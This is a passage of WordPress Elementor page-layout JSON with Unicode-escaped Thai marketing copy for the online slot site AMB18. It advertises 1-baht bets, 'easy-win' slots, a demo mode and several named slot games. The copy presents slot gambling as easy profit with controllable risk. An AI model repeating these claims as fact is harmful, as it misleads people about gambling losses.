\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 